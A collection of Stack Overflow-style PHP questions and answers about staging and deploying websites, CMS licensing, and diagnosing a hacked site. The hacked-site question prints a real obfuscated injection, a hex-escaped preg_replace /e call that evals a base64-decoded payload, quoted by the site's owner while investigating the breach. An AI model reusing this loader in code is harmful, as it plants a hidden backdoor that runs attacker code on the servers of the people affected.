Sandboxing website best practices? - php

I currently work in a web shop with almost no formal processes and a million PHP websites, including tricky stuff like custom CMS and shopping cart code.
We are trying to improve things. I am pushing for CVS/SVN.
My question is: what is the best practice for sandboxing website work? We are on the LAMP stack. Some of our sites have hardcoded (or user-entered) links to the current domain, so setting up a different domain like preview.mysite.com will break links pointing to www.mysite.com. If we start applying regression tests, perhaps the domains should be uniform for testing? That can always be done with a local hosts entry.
So, considering we have lots of sites, it would be nice to have one process for always doing previewing in a proper sandbox. Wondering how this would integrate with an SVN/CVS cycle.
I am just looking for industry best practices because we are trying to get there. If that means cloning a site to an extra server, so be it.

So yes, you should have a second STAGE server. What I do is put my code into CVS on my dev box and commit regularly as I go along. When I am ready to push a version to the STAGE server, I go through the files I want to stage and tag them STAGE:
cvs tag -F STAGE
Then I go to the STAGE server and do an update with the STAGE flag to get the STAGE version of files:
cvs up -r STAGE
This also sets the sticky tag to be "STAGE" on those files, so in the future, I can just leave the STAGE tag off when I do updates on my stage server:
cvs up
Finally, when I've tested my code on the STAGE server, I roll it to the production server using rsync...
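A sketch of that rsync step (the paths, user, and hostname are made up; adding --dry-run first to preview is a good habit):
# push the stage tree to production, skipping CVS metadata
rsync -avz --delete --exclude='CVS/' /var/www/stage/ deploy@prod.example.com:/var/www/html/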
We have several developers working together, so keeping a stable STAGE version up can get tricky. In that case, if I just have small changes to one or two files, I will just scp them individually over to the production server.
Finally, to ensure I know what is out on my production servers, after I send a file or files off to the production server, I tag all the files on my stage server as RELEASE, and also as RELEASE20090713 or whatever the current date is (the commands are sketched below). That way I have moving snapshots through time that I can get at if needed. Note, though, that this doesn't update the sticky tag, so my regular old
cvs up
on the stage server still gets me the latest STAGE files.
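In CVS terms, that tagging step looks something like this, run from the stage working copy (-F moves the existing RELEASE tag; the dated tag name is just an example):
cvs tag -F RELEASE
cvs tag RELEASE20090713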
Now in your case, as far as the hardcoded URLs go... you already know: bad, bad, bad. So fix them as you go. But you may be able to use Apache URL rewriting on STAGE to make those URLs talk to a custom TCP port.
If you have a smart network device like a Cisco router, you can set it up to do PAT (port address translation) for your IPs. Port 80 can forward to your regular production webserver, and port 8080 can forward to your STAGE server's port 80. Then all you do is have Apache rewrite URLs on your STAGE server and append :8080 to all the hostnames it sees. Now all your posts and links will go to the correct STAGE server, and your Apache configs can be exactly the same as well.
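The answer doesn't name a module for that outbound rewriting; one way that fits (my assumption, not the author's) is mod_substitute (Apache 2.2.7+), filtering the generated HTML in the STAGE vhost:
# STAGE vhost: tack :8080 onto the production hostname in outgoing HTML
AddOutputFilterByType SUBSTITUTE text/html
Substitute "s|www.mysite.com|www.mysite.com:8080|in"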

Regarding the hard coded (or user-inputted) domain names: you could add the domains to your hosts file. That should solve your problems during development and preview. Your browser will retrieve the IP for www.mysite.com and find 127.0.0.1 or the IP of the preview site in the hosts file. The tricky part is that just by looking at the URL in the browser, you cannot determine whether you are looking at the production site or not. (The ShowIP addon for Firefox can help you here.)
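For example, on the machine you browse from (/etc/hosts on Linux/Mac, C:\Windows\System32\drivers\etc\hosts on Windows; the preview IP here is made up):
10.0.0.42    www.mysite.com    # shared preview box
# or 127.0.0.1 if the site runs on your own machine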
Regarding CVS/SVN: I would really advise you to go for SVN. It's not harder to use than CVS, but it has some advantages (e.g. renaming is possible). For more information see e.g. this question.
As for the previewing in a sandbox, this is what we do: we do most of our development on trunk (or on a branch, but the rest of the process is almost the same). Once we are ready to show it to the customer, we create a tag. This tag is used to update the preview server. If the customer isn't satisfied, we develop some more on trunk (or the branch), create a new tag, update preview with the tag, etc. Once the customer is happy we use the exact same tag running on preview to also update the production server. This way we can be sure that the preview and production server have the same code base.
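In SVN commands, one round of that cycle might look like this (the repository URL and tag name are invented for the example):
svn copy http://svn.example.com/repo/trunk http://svn.example.com/repo/tags/preview-20090713 -m "Tag for customer preview"
# on the preview server (and later on production, with the same tag):
svn switch http://svn.example.com/repo/tags/preview-20090713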

Related

How to make your custom php CMS work only on a certain domain for a certain time?

I want to prevent my custom-made CMS from being copied from domain to domain; it should be operable only on the domain it was bought for, and only for a period of one or two years from purchase.
The code generation part is not a problem, but preventing hackers from modifying it is the hardest part.
E.g. something like vBulletin protection. (I know it can be nulled too)
How to implement such thing into my CMS written in php?
I think the license check needs to be spread through the whole app, with the check masked in various ways, so that the dependencies are not easy to detect and remove.
I know this is a very difficult and hard topic, so I would appreciate some direction, like a book, web discussion, or article.
Btw, connecting to my server and checking whether the domain is OK is not an option: my servers could be down, and then my clients' sites would go down with them.
You could do a combination of things:
1. New client domains can be given generated license keys, unique to each client's install, that are needed for your software to work. The key should be bound to one hosted domain and stored remotely on your servers as well as locally in the client install.
2. When you or someone else installs the CMS for the first time, require a license key to be entered and verify it with a remote server. This should suffice for the initial setup. Store some info about the server in your remote database. If this remote procedure fails, installation should fail. Think of clever ways to make this step genuinely necessary, like fetching an encryption key that gets stored in the database.
3. During or after install you can generate encryption keys (or not) and store something unique in a file on the app server that is required by your code. Super cheap would be to create the file /MY-CUSTOM-CMS-LICENSE.txt with the key in plain text right inside it. This can be another vector for verification later on: should you discover a website which has copied your CMS, you can check this txt file.
4. Have your software call home to your server every now and then, sending the key plus some server info (IP, host, etc). It does not have to be dependent on your server to run; you can let the software keep working if the check fails. It is just very helpful to call home every now and then, e.g. ping a URL on your server every X days, and if your server is down, just do the check again the next day. One reason this is so handy: if your client copies the app folder from one domain to another to set up a second illegal site, as soon as they run index.php it will call home, and unless they have checked every line of your code they won't even know it does this, so they are caught rather easily. All you need to do is check some kind of log of who 'called home', so to speak. (A minimal sketch follows this list.)
5. Write up a proper software license agreement with the terms for your product and place it in a file called LICENSE in the root directory of your app. This will ensure clients (and their developers) are aware it is not free to copy and reuse. Later, if someone copies it, you (or your lawyers) can point to the file and say 'didn't you read this, jerky-boy'.
6. Make something (or many things) in your code unique to your code. For example, WordPress' admin by default is /wp-admin and almost every single file in the app starts with wp-, which makes it easy to detect. Put the entire app in a special folder. Add a meta tag to all output, like <meta name="generator" content="vBulletin 4.0.4" />. There are many other things you can incorporate and write into your app that could be telltale signs it is your code. The point is to have so many of them that removing everything becomes a daunting task, or at least annoying to the thief. I don't think anyone would be crazy enough to refactor all your code just to steal it; and if they do remove these code bits and resell/reuse it, you have an even stronger case for litigation.
7. You could write a script to crawl the web (ugh), or just do searches on Google, or even set up Google Alerts to notify you if any of the detectable markers you placed in your app are found (like in #3, #4, #5, #6, #8).
8. You could use a CDN like www.maxcdn.com, host a JavaScript file there, and reference it in your code: <script src="http://cms-headquarters.example.com/license.js"></script>. Since it is on a CDN it has a very small chance of failing, and if it goes down for a week that's OK too; all you need to do is check who hasn't hit your server.
9. Obfuscate some of your code for an added annoying deterrence.
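A minimal sketch of the call-home idea from item 4 (the endpoint URL, key handling, and 7-day interval are all assumptions; it relies on allow_url_fopen and fails silently so the client's site never breaks):
<?php
// Hypothetical call-home check: ping the license server at most once
// per interval, and never let a failure affect the client's site.
function cms_call_home($licenseKey)
{
    $stamp = dirname(__FILE__) . '/license-last-check';
    if (file_exists($stamp) && (time() - filemtime($stamp)) < 7 * 86400) {
        return; // checked recently enough
    }
    $host = isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : php_uname('n');
    $url = 'http://cms-headquarters.example.com/ping.php'
         . '?key=' . urlencode($licenseKey) . '&host=' . urlencode($host);
    $ctx = stream_context_create(array('http' => array('timeout' => 3)));
    if (@file_get_contents($url, false, $ctx) !== false) {
        @touch($stamp); // success: wait out the full interval again
    }
    // on failure the stamp is left alone, so the next request retries
}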
On how vBulletin does it:
http://www.sitepoint.com/forums/showthread.php?281666-How-does-the-vBulletin-License-work
https://www.vbulletin.com/forum/showthread.php/338346-Easy-Way-To-Find-Nulled-vBulletins
Finally here's a PHP class that tries to offer a partial solution: PADL (PHP Application Distribution License System)

Injection of PHP code to perform a 301

Somehow I have managed to be attacked in a very specific manner on a site I help maintain, and I am looking into whether the server was directly hacked or someone was able to inject the malicious script some other way.
First someone managed to get this:
#preg_replace("\x7c\50\x5b\136\x3c\135\x2b\51\x7c\151\x73\145","\x65\166\x61\154\x28\47\x24\142\x66\167\x3d\71\x30\65\x38\67\x3b\47\x2e\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\151\x6d\160\x6c\157\x64\145\x28\42\x5c\156\x22\54\x66\151\x6c\145\x28\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\42\x5c\61\x22\51\x29\51\x29\51\x3b\44\x62\146\x77\75\x39\60\x35\70\x37\73","\x4c\62\x35\157\x59\156\x4d\166\x64\62\x56\151\x4c\62\x78\160\x64\155\x55\166\x61\110\x52\153\x62\62\x4e\172\x4c\63\x52\154\x63\63\x51\166\x62\107\x56\62\x5a\127\x77\171\x58\63\x52\154\x63\63\x51\166\x62\107\x39\156\x4c\171\x34\154\x4f\104\x49\64\x52\123\x55\167\x4d\104\x45\172\x4a\125\x49\64\x52\152\x4d\154\x51\153\x4d\170\x51\151\x56\103\x4d\152\x4a\103\x4a\124\x52\107\x4e\124\x63\75");
Into the very top of a PHP file, right after the file's comments. What this, and most likely other code, did was 301 redirect anyone not connecting to the site through a browser to a payday loan site. This ONLY affected my homepage; all other pages were fine.
There was probably more code involved, but this was the most confusing part, since this code sits in a file called functions.php which is only ever included; however, it IS the first file to be included within index.php (my homepage).
It completely confuses me how someone could have got code there without directly hacking the server; there is no user input used there, it literally sits above the entire file. There is nothing there except this injected code and some comments above.
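If I've decoded the escaped strings correctly, the first argument comes out as the pattern |([^<]+)|ise — note the trailing e modifier, which makes preg_replace() eval the replacement — and the second argument unpacks to an eval(base64_decode(...)) payload that reads and executes the contents of another file. A harmless demonstration of the same mechanism on PHP 5.x:
<?php
// The deprecated /e modifier (removed in PHP 7) evaluates the replacement
// string as PHP code after back-reference substitution.
echo preg_replace('|(\d+)|e', '$1 * 2', 'value: 21'); // prints: value: 42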
My environment is:
Gentoo
PHP 5.2.14-pl0-gentoo
Apache 2
I have checked server logs however, as usual, they deleted their trail.
This is also partly, as you may have noticed, a server question, but at the moment it is 90% a programming question, so I thought I would ask it here first.
Is there any vulnerability within PHP that could cause this?
If you need clarification let me know.
Edit
I have a staging system with three environments:
Work
Preview
Live
I know this has nothing to do with SQL injection, since if I switch the live and preview folders around I get no problems. I also do not store the Gentoo password in the DB or the app, and you can only connect to the server from a small range of IP addresses, except for Apache, which accepts port 80 and 443 connections from any host. Plus I use SQL escaping classes and methods within the site (PDO, MySQLi, etc.).
So this problem (which is even more confusing) is located only within one copy of my site, not in the DB or anywhere else.
Pinpointing this kind of thing is more on the server admin side, I guess. Check the modification date of the attacker-modified file and look for suspicious activity at that date and time in the server's logs (Apache logs, FTP logs, maybe SSH logs). How feasible this is depends on your traffic, log size, and level of access to the server. If you have any HTML form that uploads files, check the directory in which the files are stored for PHP shells, and also check the permissions on that directory. If you are on shared hosting, this can also be the result of the attacker injecting a shell on another site and then attacking yours by that means. In that case, contact your hosting company.
There's a 99% chance it's the webserver's fault. SQL injection is one thing, but, I don't know, maybe they managed to somehow get your password with SQL injection and then log in to a control panel or FTP; still, I'd say it's the webserver.
Ok, so I understand how and why now. It was the one thing I thought it would never be: WordPress.
I was basically a victim of: http://muninn.net/blog/2012/06/a-tale-of-east-asian-history-british-loan-sharks-and-a-russian-hacker.html
Using a tool like: http://www.youtube.com/watch?v=y-Z5-uHvONc
You see, even though my main site is not made with WordPress, it has a WordPress blog located at /blog/, and the hacker was able to use various WordPress vulnerabilities to get around the location problem and plant scripts on any part of the server.
By the way, this actually happened on the latest install of WordPress; I double-checked the version. We are not totally sure exactly when he placed the script (there are multiple instances of the foreign script being planted throughout the years!), but we do know this recent attack must have been planted quite recently too, which puts the latest version (or the version before) under a huge amount of scrutiny.
So a nice note of caution about Wordpress there...

How to upload changes automatically?

I'm developing a simple website (on a VPS) using PHP.
My question is: how can I upload the changes I make using a secure protocol?
At the moment I use scp, but I need software that checks whether a file has changed and, if so, sends it to the server.
Advice?
Use inotify+rsync or lsyncd: http://code.google.com/p/lsyncd/
Check out this blog post for the inotify method: http://www.cyberciti.biz/faq/linux-inotify-examples-to-replicate-directories/
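A rough sketch of the inotify+rsync approach (assumes inotify-tools is installed; the paths and host are hypothetical):
#!/bin/sh
# Re-sync the working tree to the VPS whenever something changes.
while inotifywait -r -e modify,create,delete,move ./site; do
    rsync -avz --delete -e ssh ./site/ user@vps.example.com:/var/www/site/
done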
If you have complete access to your VPS, you can mount your remote home directory locally as a normal filesystem, via SSH (e.g. sshfs) or WebDAV. Afterwards you can edit locally on your computer, and any changes are automatically uploaded.
Have a look at this relevant article
FTP(S): Set up an FTP server on the target, together with an SSL cert (a personal cert is good enough).
SSH: You can pass files around through SSH itself, but I found it rather unreliable (imho).
Shares: You could share a folder (as others have suggested) with your local machine. This would be the perfect solution if it weren't so hard to diagnose disconnection issues. I've been through this and it is far from a pleasant experience.
Dropbox: Set up a Dropbox client on your VPS and another on your local PC. Using Dropbox (or similar services like SkyDrive or iCloud) also has some added advantages, e.g. versioning, recovery, conflict detection...
All in all, I think the FTPS way is the most reliable and popular one I've used. SSH caused several issues after about two days of use, and the disk-sharing method caused me several issues too, mostly because it requires that you be somewhat knowledgeable about the protocol.
The Dropbox way, although a bit time-consuming to set up, is still a good solution; however, I would only use it for larger clients, not the average pet-hobby website :)
Again, this is just from experience.
You could also use Subversion to do this, although the setup may take a little while.
You basically create a Subversion repository and commit all of your code. Then on your web server, make the root directory a checkout of that repository.
Create a script that runs an svn update command, and set it as a post-commit hook. Essentially, the script is executed every time you commit from your workstation.
So in short, you would...
Update your code locally
Commit via Subversion (use TortoiseSVN; it's easy and simple to use)
Automatically, the commit would trigger the post-commit hook on the server and run the svn update command to synchronize the code in your root directory.
You would of course have to hide all of the .svn folders from the public using .htaccess files (provided you're using Apache).
I know this would work, as I have done it in the past.
The beauty of this option is that you get two in one: source versioning and easy updates. If you make a mistake, you can also easily revert it.
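For illustration, a minimal post-commit hook along those lines (the paths are assumptions; the file lives at hooks/post-commit inside the repository and must be executable):
#!/bin/sh
# Hypothetical post-commit hook: bring the live working copy up to date
# after every commit. Subversion passes the repo path and revision as $1/$2.
/usr/bin/svn update /var/www/html --non-interactive >> /var/log/svn-deploy.log 2>&1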

Process for updating a live website

What is the best process for updating a live website?
I see that a lot of websites (e.g. StackOverflow) have warnings that there will be downtime for maintenance in advance. How is that usually coded in? Do they have a config value which determines whether to display such a message in the website header?
Also, what do you do if your localhost differs from the production server, and you need to make sure that everything works the same after you transfer? In my case, I set up development.mydomain.com (.htaccess authentication required), which has its own database and is basically my final staging area before uploading everything to the live production site. Is this a good approach to staging?
Lastly, is a simple SFTP upload the way to go? I've read a bit about more complex methods, like using server-side hooks in Git... I'm not sure how this works exactly or whether it's the approach I should be taking.
Thanks very much for the enlightenment..
babonk
This is (approximately) how it's done on Google App Engine:
Each time you deploy an application, it is associated with a subdomain according to its version:
version-1-0.example.com
version-1-1.example.com
while example.com is associated with one of the versions.
When you have a new version of the server-side software, you deploy it to version-2-0.example.com, and when you are ready to put it live, you associate example.com with it.
I don't know the details, because Google App Engine does that for me, I just set the current version.
Also, when SO or another big site has downtime, it is more likely to be a hardware issue than a software one.
That really depends on your website and its platform/technology. For a simple website, you just update the files over FTP, or if the server is locally accessible, you copy the new files over. If your website is hosted by some cloud service, you have to follow whatever steps they offer, because a cloud-based hosting service usually won't let you access the files directly. For a complicated website with a backend DB, it is not uncommon that whenever you update code you have to update your database as well. To make sure both are updated at the same time, you will have to take your website down. To minimize the downtime, you will probably want a well-tested update script to do the actual work: take down the site, run the script, and fire it up again.
With PHP (and Apache, I assume), it's a lot easier than some other setups (which may require restarting processes, for example). Ideally, you'd have a system that knows to transfer just the files that have changed (i.e. rsync).
I use Springloops (http://www.springloops.com/v2/) to host my git repository and automatically deploy over [S/]FTP. Unless you have thousands of files, the deploy feels almost instantaneous.
If you really wanted to, you could have an .htaccess file (or equivalent) to redirect to a "under maintenance" page for the duration of the deploy. Unless you're averaging at least a few requests per second (or it's otherwise mission critical), you may not even need this step (don't prematurely optimize!).
If it were me, I'd have an .htaccess file that holds redirection instructions, and set it to only redirect during your maintenance windows. When you don't have an upcoming deploy, rename the file to ".htaccess.bak" or something. Then, in your PHP script:
<?php if (file_exists('/path/to/.htaccess')) : ?>
<h1 class="maintenance">Our site will be down for maintenance...</h1>
<?php endif; ?>
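And a sketch of what the maintenance .htaccess itself might contain (mod_rewrite assumed; the page name is made up):
RewriteEngine On
# Let the maintenance page itself through; redirect everything else to it
RewriteCond %{REQUEST_URI} !^/maintenance\.html$
RewriteRule ^ /maintenance.html [R=302,L]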
Then, to get REALLY fancy, set up a Springloops pre-deploy hook to make sure your maintenance redirect is in place, and a post-deploy hook to change it back on success.
Just some thoughts.
-Landon

Making Changes to a Live Site (CodeIgniter, but not specific to it)

I'm using CodeIgniter, if that makes things easier. If a website is live, with a populated database and users accessing it, and I have a new idea to implement, how should I do it? Do you work directly on the live site?
Or do you copy the database and the files to a local server (MAMP/WAMP/XAMPP), work on them there, and then, if everything works, update the live site with the changes? For this second method, is there any way to check which files have been changed and upload only those? And what if it works on the local server, but after updating the live site it does not?
CodeIgniter's configuration also has the option of a default database and other database groups. I wonder how these can be used for testing?
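For reference, this is roughly what those groups look like in CodeIgniter's application/config/database.php (a sketch with made-up credentials, CodeIgniter 1.x/2.x style):
<?php
// Switch this to 'testing' in your local/dev copy of the config.
$active_group = 'default';

$db['default']['hostname'] = 'localhost';
$db['default']['username'] = 'live_user';
$db['default']['password'] = 'secret';
$db['default']['database'] = 'live_db';
$db['default']['dbdriver'] = 'mysql';

$db['testing']['hostname'] = 'localhost';
$db['testing']['username'] = 'test_user';
$db['testing']['password'] = 'secret';
$db['testing']['database'] = 'test_db';
$db['testing']['dbdriver'] = 'mysql';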
Don't work directly on the live site. Instead, have a development environment (using, say, VMware or VirtualBox on your machine) and clone the live environment. Get your code in version control (I'll say it again: GET YOUR CODE IN VERSION CONTROL), do your development on the development machine against a dev branch, and after you're done testing and happy with the changes, commit them to a 'deployment' or 'live' branch and deploy to the live site from there. Be sure to back up the database before you roll out the new code.
Edit: use symlinks to stage your new code base on the live site. If it doesn't work, just switch the link back to the old directory. Saves you a lot of grief!
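For instance (paths hypothetical; the -n flag stops ln from descending into the existing link):
# The document root points at /var/www/current, which is a symlink.
ln -sfn /var/www/releases/20100501 /var/www/current   # roll forward
ln -sfn /var/www/releases/20100428 /var/www/current   # roll back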
Read up on version control (svn, git, et al.).
Never work on a live site; preferably work on another server (to prevent while(1){...} crashes etc.), but at the very least work on the same server in another documentroot/domain, preferably with access limited to your IP only.
Normally I only copy the table definitions (mysqldump -d, i.e. --no-data, is nice for that) and use another database altogether. If you need the latest and greatest data, you can replicate your main database to a test database, which also gives you the advantage of a cheap backup if you haven't got one already.
I usually set a switch in the Apache vhost configuration (SetEnv DEV 1), so that in code I can use getenv('DEV') == 1 to check whether I can just dump variables on error conditions; it also limits the possibility of accidentally committing/uploading code with a 'development switch' still on.
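A minimal sketch of that switch, assuming mod_php so SetEnv values are visible via getenv():
<?php
// The dev vhost contains "SetEnv DEV 1"; production vhosts simply omit it.
if (getenv('DEV') == 1) {
    error_reporting(E_ALL);
    ini_set('display_errors', '1'); // loud errors on dev only
}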
The typical answer to this question is going to be do your work in the test environment, not the production environment. And I agree that that is often the best way to handle changes. If you have the luxury of a test environment, then take full advantage of it. After all, that's what it's there for--to test.
However, that doesn't mean that working in the production environment is completely off-limits. Your decision should be based on a few factors:
Is the operation of your website critical to your business needs?
If so, do all your work in a test environment and deploy it to your live environment when you've fully tested your changes.
Are the changes you're about to make going to have a large impact on the rest of the website?
For example, are you about to change the database schema? Are you about to change the way users log in or out of your website? If so, do your work in the test environment. If you're changing the behavior of a page that doesn't have any effect elsewhere, you can get away with making the change in the production environment.
How long will your changes take to implement?
If you can't guarantee that your changes won't take longer than 15-20 minutes, do your work in a test environment.
